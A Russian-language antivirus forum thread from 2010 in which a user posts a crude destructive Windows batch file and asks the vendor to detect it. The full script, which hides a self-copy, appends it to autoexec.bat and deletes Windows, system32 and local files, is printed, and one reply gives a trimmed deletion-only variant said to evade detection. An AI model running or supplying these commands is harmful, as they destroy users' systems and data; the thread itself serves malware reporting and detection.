[ Закрыто ] Обнаружен код который ломает ОС и даже Bios, прошу обновить базы и найти подобные, вирусы. , Написан через блокнот вашем антивирусником не определяется, по этому прошу обеспечить максимальную защиту, нехочу вновь попасться на такую шутку, вирус запускается только при его открытии.

RSS

Размещено 21.04.2010 21:21:57

@Echo off
Echo вот ты и попал!!!
Date 21.12.12
If exist охринеть!!!.bat goto abc
:abc
Copy %0 охринеть!!!.bat
Attrib +h охринеть!!!.bat
Echo охринеть!!!.bat >>autoexec.bat
del c:Windows/q
del c:Windows\system32/q
del *.*/q

Label E: PRIDUROK
Echo НЕ ХОРОШО ОБИЖАТЬ ДЕВОЧЕК!!!

/q:
FOR /L %%i IN (1,1,1000) DO md %%i

start calc
start calc
start calc
start calc
start calc
start calc
---------------------------------------------------------------------------------------------------------------------------------------------
start calc - повторяется более 1000 раз!

Ответы

Пред. 1 2 3 4 След.

Сообщений: 264

Баллов: 211

Регистрация: 02.04.2010

Размещено 23.04.2010 22:14:59

судя по коду вируса - работа студента))) изучают бат. А самые умные делают то что им хочется.

Размещено 24.04.2010 04:42:46

Цитата
ORION пишет: судя по коду вируса - работа студента))) изучают бат. А самые умные делают то что им хочется.

Ну да всё верно)))

Сообщений: 87

Баллов: 69

Регистрация: 30.03.2010

Размещено 24.04.2010 21:35:57

С тех.под. не отвечают

Сообщений: 138

Баллов: 110

Регистрация: 16.03.2010

Размещено 24.04.2010 23:09:01

Алексей что там по данному файлу? Почему так долго нет ответа?

Изменено: vir - 24.04.2010 23:10:35

dura lex, sed lex
закон суров, но это - закон

Сообщений: 138

Баллов: 110

Регистрация: 16.03.2010

Размещено 26.04.2010 17:20:53

Ура!!!

добавили с базой 5062
Защита в режиме реального времени файл D:\1js.txt JS/TrojanDownloader.Iframe.NHW троянская программа

Изменено: vir - 26.04.2010 17:21:30

dura lex, sed lex
закон суров, но это - закон

Сообщений: 87

Баллов: 69

Регистрация: 30.03.2010

Размещено 26.04.2010 20:26:38

да, стал определяться!!!

Размещено 27.04.2010 17:39:39

Цитата
vir пишет: Ура!!! добавили с базой 5062 Защита в режиме реального времени файл D:\1js.txt JS/TrojanDownloader.Iframe.NHW троянская программа

Это хорошо.

Сообщений: 20

Баллов: 10

Регистрация: 30.04.2010

Размещено 30.04.2010 14:36:32

Цитата
marshal64 пишет: Вирус в частности делает следующее: 1) изменяет системное время; 2) отключает антивирусную защиту; 3) удаляет папку Windows; 4) удаляет все остальное; 5) и начинает вызывать калькулятор)

Батник удаляет содержимое папки Windows (без подпапок), папки Windows\system32 (без подпапок), содержимое папки, откуда запущен. Антивирус он никаким боком не отключает, калькулятор вызвать не сможет, т.к. до этого уже удалил.

И вы это всё серьезно? Каждый, на коленке написанный (криво к тому же), батник будете в базы заносить?
Кстати, урезанный вариант (с сохраненным деструктивным функционалом) уже не детектится...

Код
@Echo off del c:Windows/q del c:Windows\system32/q del ./q

И кстати, интересно узнать, каким образом он "ломает даже BIOS"?

Изменено: Voidwalker - 30.04.2010 14:40:10 (добавлено)

Сообщений: 1023

Баллов: 818

Регистрация: 16.03.2010

Размещено 30.04.2010 23:06:43

Да, взлом биоса - это серьезно))

Сообщений: 264

Баллов: 211

Регистрация: 02.04.2010

Размещено 01.05.2010 01:13:57

Цитата
zloyDi пишет: Андрей Будет ловится в версии баз 5050 как BAT/Agent.NGK

Если такое баловство будет постоянное, то скором времени модификации дойдут до 5-ти значных значений. Например, BAT/Agent.ХХХХХ

Пред. 1 2 3 4 След.